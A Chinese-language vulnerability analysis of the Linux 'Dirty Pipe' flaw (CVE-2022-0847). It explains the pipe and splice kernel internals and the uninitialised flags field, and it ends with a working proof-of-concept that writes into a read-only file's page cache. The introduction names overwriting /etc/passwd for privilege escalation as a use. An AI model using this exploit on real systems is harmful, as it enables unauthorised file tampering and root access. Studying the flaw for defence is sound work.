CVE-2022-0847

简介

本质上，这个漏洞是由内存未初始化造成的（pipe buffer的flags字段没有被初始化）。此漏洞一般用于提权：攻击者可以向只读文件的页缓存写入数据，例如覆写/etc/passwd文件，从而达到任意文件写的效果。

受影响的内核版本为5.8及以上，该漏洞已在5.16.11、5.15.25和5.10.102中修复。

fork

一个进程，包括代码、数据和分配给进程的资源。fork可以克隆一个进程。

fork会返回一个PID：在子进程中返回0，在父进程中返回子进程的PID（大于0），失败时返回-1。

pipe

管道通信

# include <unistd.h>
int pipe(int pipefd[2]);
/* pipe() creates a pipe, a channel that can be used for inter-process communication. The array pipefd is used to return two file descriptors referring to the ends of the pipe.
pipefd[0] refers to the read end of the pipe and pipefd[1] refers to the write end. Data written to the write end is buffered by the kernel until it is read from the read end. (The original note points to further details elsewhere, presumably the pipe manual pages.) */
int pipe2(int pipefd[2], int flags);	/* If flags is 0, pipe2() behaves the same as pipe(). */
// On success, zero is returned. On error, -1 is returned, errno is set to indicate the error, and pipefd is left unchanged.

样例

以下程序创建一个管道，然后forks创建子进程，子级进程继承了一组重复的文件描述符，这些描述符引用同一管道。

在fork之后，每个进程都会关闭自己不需要的管道文件描述符。然后，父进程把命令行参数中的字符串写入管道，子进程从管道中逐字节读取该字符串，并回显到标准输出。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
/*
 * Pipe demo: the parent writes argv[1] into a pipe and the forked child
 * copies it byte by byte to standard output, followed by a newline.
 *
 * Exits with EXIT_FAILURE on a usage error or if pipe()/fork() fails,
 * otherwise with EXIT_SUCCESS.
 */
int main(int argc, char *argv[])
{
   pid_t  child;
   int    fds[2];
   char   ch;

   if (argc != 2) {
       fprintf(stderr, "Usage: %s <string>\n", argv[0]);
       exit(EXIT_FAILURE);
   }

   if (pipe(fds) == -1) {
       perror("pipe");
       exit(EXIT_FAILURE);
   }

   child = fork();
   if (child == -1) {
       perror("fork");
       exit(EXIT_FAILURE);
   }

   if (child != 0) {
       /* Parent: acts as the writer, so it has no use for the read end. */
       close(fds[0]);
       write(fds[1], argv[1], strlen(argv[1]));
       close(fds[1]);             /* closing the write end lets the reader see EOF */
       wait(NULL);                /* wait for the child to finish */
       exit(EXIT_SUCCESS);
   }

   /* Child: acts as the reader, so it has no use for the write end. */
   close(fds[1]);
   for (;;) {
       if (read(fds[0], &ch, 1) <= 0)
           break;
       write(STDOUT_FILENO, &ch, 1);
   }
   write(STDOUT_FILENO, "\n", 1);
   close(fds[0]);                 /* reading finished */
   _exit(EXIT_SUCCESS);
}

主要结构体

/* Abridged view of the kernel's per-pipe state; each "..." marks fields omitted from this excerpt. */
struct pipe_inode_info {
...
	unsigned int head;	// head of the queue (ring)
	unsigned int tail;	// tail of the queue (ring)
	unsigned int max_usage;	// maximum number of buffers that may be in use
	unsigned int ring_size;	// used as (ring_size - 1) to mask indices into bufs elsewhere in this document
...
	struct page *tmp_page;	// per the original note: a struct page does not point at the data directly, it describes a physical page frame
...
	struct pipe_buffer *bufs;	// the ring of pipe_buffer slots, indexed with head/tail
...
};

pipe在内核中使用了环状buffer（bufs字段），而默认的数量为16个（PIPE_DEF_BUFFERS），每一个struct pipe_buffer管理一个buffer，而一个buffer为一页的大小（默认0x1000）。pipe为FIFO的结构体，这可以从head和tail两个字段体现出来，head指向最新生产的buffer，而tail指向开始消费的buffer。

/*
 * One slot of the pipe ring.
 *
 * page    - describes the physical page frame that holds the data
 * offset  - start of the valid data within the page
 * len     - number of valid bytes starting at offset
 * ops     - operations table for this buffer
 * flags   - per-buffer flag bits (e.g. PIPE_BUF_FLAG_CAN_MERGE)
 * private - not used by any code shown in this document
 */
struct pipe_buffer {
	struct page *page;
	unsigned int offset;
	unsigned int len;
	const struct pipe_buf_operations *ops;
	unsigned int flags;
	unsigned long private;
};

pipe的使用

/*
 * Abridged excerpt of the kernel's pipe_write(). The dashed line marks code
 * that was left out, and the excerpt stops in the middle of the main loop.
 * It shows two things: the attempt to append ("merge") small writes into the
 * most recently used buffer, and the initialisation of a fresh pipe_buffer.
 */
static ssize_t 
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
    // Fetch the pipe state attached to the file
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
    // total_len is the number of bytes requested by this write
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;
---------------------------------------
	head = pipe->head;
	was_empty = true;
    
    /* pipe_write uses a merge strategy: if we write 1 byte to the pipe 16 times, those 16 bytes do not occupy 16 separate pipe_buffers; they are appended one after another into the first pipe_buffer. Otherwise the pipe would fill up almost immediately and its utilisation would be very poor. Merging is controlled by the PIPE_BUF_FLAG_CAN_MERGE bit in the flags field of struct pipe_buffer. */
    // Candidate for merging: the sub-page remainder of the write length
	chars = total_len & (PAGE_SIZE-1);
	// Only try to merge when there is a remainder and the ring is not empty
	if (chars && !pipe_empty(head, pipe->tail)) {
	unsigned int mask = pipe->ring_size - 1;
    // Look at the slot just before head, i.e. the most recently filled one
	struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
    // End offset of the data already stored in that page
	int offset = buf->offset + buf->len;
	if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && // the buffer allows merging
		offset + chars <= PAGE_SIZE) { // and the result still fits in one page
			ret = pipe_buf_confirm(pipe, buf);	// check that the buffer can be appended to
        	// Copy the data: copy_page_from_iter(destination page, offset within the page, byte count, data source)
			ret = copy_page_from_iter(buf->page, offset, chars, from);
		}
	}
    
    // The merge did not happen or did not cover everything: handle the remaining data
	for (;;) {
		head = pipe->head;
    	// If the pipe is not full
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
 				unsigned int mask = pipe->ring_size - 1;
    			// Take the pipe buffer slot at head
				struct pipe_buffer *buf = &pipe->bufs[head & mask];
				struct page *page = pipe->tmp_page;
				int copied;
				// No cached page available: allocate a new one; tmp_page serves as a cached spare page
				if (!page) {
						page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
		 				pipe->tmp_page = page;
	 			}
				// head++ : claim the slot
	 			pipe->head = head + 1;
				spin_unlock_irq(&pipe->rd_wait.lock);	// releases rd_wait.lock (this is an unlock, not a lock)
				// Initialise every field of the pipe_buffer, because this slot is being set up as a new buffer
				buf = &pipe->bufs[head & mask];
				buf->page = page;
				buf->ops = &anon_pipe_buf_ops;
				buf->offset = 0;
				buf->len = 0;
				if (is_packetized(filp)) // usually not taken
					buf->flags = PIPE_BUF_FLAG_PACKET;
				else
				// Mark the buffer as mergeable: PIPE_BUF_FLAG_CAN_MERGE
					buf->flags = PIPE_BUF_FLAG_CAN_MERGE; 
				pipe->tmp_page = NULL;
                // Copy the data into the page
				copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
				ret += copied;
            	buf->offset = 0;
				buf->len = copied;

相对应的，pipe_read也是通过pipe_inode_info拿到pipe_buffer进行读取，这里就不再分析。需要注意的是，pipe_buffer在read过程中只会被修改其offset和len字段，并不会被释放或是修改其flags字段，也就是说PIPE_BUF_FLAG_CAN_MERGE一旦设置，则在read/write的过程中就不会再被清除掉。

splice

基本属性

splice()本质上是为了解决文件对拷的效率问题，它实现了“零拷贝”。splice()在两个文件描述符之间移动数据，而不在内核地址空间和用户地址空间之间进行复制。它将多达len字节的数据从文件描述符fd_in传输到文件描述符fd_out，其中一个文件描述符必须引用管道。

使用splice函数时，fd_in和fd_out必须至少有一个是管道文件描述符(局限)。splice函数调用成功时返回移动字节的数量。它可能返回0，表示没有数据需要移动，这发生在从管道中读取数据（fd_in是管道文件描述符）而该管道没有被写入任何数据时。

#include <fcntl.h>
ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);
/*
fd_in: source file descriptor; the data is read from this descriptor.
off_in: pointer to the offset in the source, i.e. the read position in fd_in. May be NULL to use the current position.
fd_out: destination file descriptor; the data is written to this descriptor.
off_out: pointer to the offset in the destination, i.e. the write position in fd_out. May be NULL to use the current position.
len: number of bytes to transfer.
flags: transfer flags; optional, usually 0.
*/

splice发送信息

/**
 * Send the contents of a file to a client descriptor (splice version).
 *
 * The data is moved through an intermediate pipe in chunks of at most
 * 4096 bytes: first file -> pipe, then pipe -> client_fd. Short transfers
 * reported by splice() are handled by looping until the chunk is drained.
 *
 * @param client_fd  Destination descriptor (for example a connected socket).
 * @param file       Path of the file to send.
 * @return 0 once everything up to end-of-file has been forwarded; -1 if the
 *         file cannot be opened or examined, the pipe cannot be created, or
 *         a splice() call fails. All descriptors opened here are closed on
 *         every path; client_fd is left open for the caller.
 */
int send_file_to_client(int client_fd, char *file)
{
    enum { CHUNK_SIZE = 4096 };
    const unsigned int flags = SPLICE_F_MOVE | SPLICE_F_MORE;
    struct stat st;
    int pipefd[2];
    int rc = -1;

    int fd = open(file, O_RDONLY);
    if (fd == -1) {
        return -1;
    }

    /* Query the size through the open descriptor so it refers to the same
     * file that is about to be read, even if the path changes meanwhile. */
    if (fstat(fd, &st) == -1) {
        goto out_close_file;
    }

    /* The pipe is the relay: splice() needs a pipe on one side. */
    if (pipe(pipefd) == -1) {
        goto out_close_file;
    }

    off_t remaining = st.st_size;
    while (remaining > 0) {
        size_t want = remaining < CHUNK_SIZE ? (size_t)remaining : (size_t)CHUNK_SIZE;

        /* 1. Move file content into the pipe. */
        ssize_t queued = splice(fd, NULL, pipefd[1], NULL, want, flags);
        if (queued < 0) {
            goto out_close_pipe;
        }
        if (queued == 0) {
            break;              /* end of file reached earlier than st_size */
        }
        remaining -= queued;

        /* 2. Forward everything that was queued to the client. */
        while (queued > 0) {
            ssize_t sent = splice(pipefd[0], NULL, client_fd, NULL, (size_t)queued, flags);
            if (sent <= 0) {
                goto out_close_pipe;
            }
            queued -= sent;
        }
    }
    rc = 0;

out_close_pipe:
    close(pipefd[0]);
    close(pipefd[1]);
out_close_file:
    close(fd);
    return rc;
}

原理

SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
    int, fd_out, loff_t __user *, off_out, size_t, len, unsigned int, flags)
    // loff_t is a long long type, as can be seen in the kernel source
    {
    // Abridged: the splice system call is a thin wrapper around __do_splice
    error = __do_splice(in.file, off_in, out.file, off_out, len, flags);
    }
------------------------------------------------------------------------
// __do_splice is in turn a thin wrapper around do_splice (abridged excerpt below)
    long do_splice(struct file *in, loff_t *off_in, struct file *out, loff_t *off_out, size_t len, unsigned int flags)
    {
        struct pipe_inode_info *ipipe;
        struct pipe_inode_info *opipe;

    	// Try to obtain a pipe_inode_info from each of in/out
		ipipe = get_pipe_info(in, true);
		opipe = get_pipe_info(out, true);
    	// In the example above `in` is a regular file and `out` is a pipe, so this branch is not taken
		if (ipipe) {......}
    	// This branch is taken
		if (opipe) {
    		// Hand over to do_splice_to
			ret = do_splice_to(in, &offset, opipe, len, flags);
		}
}
------------------------------------------------------------------------
	static long do_splice_to(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len,
		unsigned int flags)
	{
    	// Dispatches through in->f_op->splice_read to the implementation for this file type
    	// Since `in` is a regular file here, that is:
        // const struct file_operations generic_ro_fops = {
        //		.splice_read	= generic_file_splice_read,
        //};
		return in->f_op->splice_read(in, ppos, pipe, len, flags);
	}
------------------------------------------------------------------------
    // The splice_read hook resolves to generic_file_splice_read (abridged excerpt)
	ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
			struct pipe_inode_info *pipe, size_t len, unsigned int flags)
	{
			struct iov_iter to;
			struct kiocb kiocb;
			unsigned int i_head;
			int ret;

    	// Author's note: iov_iter_pipe and init_sync_kiocb pack the call state into `to` and `kiocb`
    	// `to` is essentially an iterator, here one that targets the pipe
		 	iov_iter_pipe(&to, READ, pipe, len);
		 	i_head = to.head;
		 	init_sync_kiocb(&kiocb, in);
			kiocb.ki_pos = *ppos;
    		// This effectively calls in->f_op->read_iter(&kiocb, &to),
    		// i.e. generic_file_read_iter()
		 	ret = call_read_iter(in, &kiocb, &to);
	}
------------------------------------------------------------------------
// After that the call chain is:
// generic_file_read_iter()
// -> generic_file_buffered_read()
// -> copy_page_to_iter()
	size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes, struct iov_iter *i)
	{
		if (i->type & (ITER_BVEC|ITER_KVEC)) {
		} 
    	else if (unlikely(iov_iter_is_discard(i))) {
			} else if (likely(!iov_iter_is_pipe(i)))
			return copy_page_to_iter_iovec(page, offset, bytes, i);
	 	else
    	// `i` is the `to` iterator built in generic_file_splice_read, so it is a pipe iterator and this branch runs
		return copy_page_to_iter_pipe(page, offset, bytes, i);
	}

漏洞

原理

延续上面的copy_page_to_iter_pipe函数，可以看到，最主要的逻辑就在copy_page_to_iter_pipe中，之所以splice实现了CPU的零拷贝是因为他直接对目标页的ref count进行了递增，然后把目标页的物理页页框复制到pipe buffer的page处，但这里却忘记设置pipe buffer的flags字段，可以利用此处的漏洞。

使用pipe read/write，我们可以让目标pipe的每个pipe buffer都带上PIPE_BUF_FLAG_CAN_MERGE flag。之后打开目标文件，并使用splice写到之前处理过的pipe中，splice底层会帮助我们把目标文件的page cache设置到pipe buffer的page字段，但却没有修改flags字段。之后我们再调用pipe write时，由于flags字段中仍然存在PIPE_BUF_FLAG_CAN_MERGE，内容会接着上次的位置被写入同一个page中，但page其实已经变成了目标文件的page cache，导致直接修改了目标文件的page cache。如果之后有其他进程尝试读取这个文件，kernel会优先返回cache中的内容，也就是被我们修改后的page cache。

// The key function (abridged excerpt): copy_page_to_iter_pipe. `page` is the file's page, `offset` the offset within it, `bytes` the number of bytes, and `i` the pipe iterator
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes, struct iov_iter *i)
{
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    off = i->iov_offset;

    // Slot of the ring that the iterator currently points at
    buf = &pipe->bufs[i_head & p_mask];
    if (off) {......}
    // Nothing can be added when the ring is full
    if (pipe_full(i_head, p_tail, pipe->max_usage))	return 0;

    // Key point: buf->flags is never assigned in this excerpt, so the slot keeps whatever flags it already had
    buf->ops = &page_cache_pipe_buf_ops;

    // page ref_count++
    get_page(page);
    // The regular file's page itself is placed into the pipe; no data is copied
    buf->page = page;
    buf->offset = offset;
    buf->len = bytes;
    pipe->head = i_head + 1;
    i->iov_offset = offset + bytes;
    i->head = i_head;
out:
    i->count -= bytes;
    return bytes;
}

复现

首先找一台内核版本符合要求的系统，创建一个target文件，内容为11111111111111111111111111111，然后将它设置为只读权限。编译exp.c然后运行即可。

/*exp.c*/
#include<stdio.h>
#include<unistd.h>
#include<fcntl.h>
#include<malloc.h>
#include<errno.h>
/*
 * Demonstration program for the behaviour described in this document.
 * It works on a file named ./target in the current directory. No return
 * value is checked anywhere, so a failing step goes unnoticed.
 */
int main()
{
        int fd[2];
        int ret=0;
        pipe(fd);
        /* File offset handed to splice() as off_in. */
        unsigned long long offset;
        offset=2;
        /* Scratch buffer; its contents are never initialised, only the byte counts below matter. */
        void *p=malloc(0xaaaa);
        /* 16 writes of 4096 bytes each, then 16 reads of 4096 bytes each to drain the pipe again.
           16 matches the default number of pipe buffers mentioned earlier in this document. */
        for(int i=0;i<16;i++)   write(fd[1],p,4096);
        for(int i=0;i<16;i++)   read(fd[0],p,4096);
        /* The target file is opened read-only. */
        int target=open("./target",O_RDONLY);
        /* Splice a single byte from the target (at `offset`) into the pipe's write end. */
        ret = splice(target,&offset,fd[1],NULL,1,0);
        /* Ordinary 4-byte pipe write issued right after the splice. */
        write(fd[1],"PPP\0",4);
        return 0;
}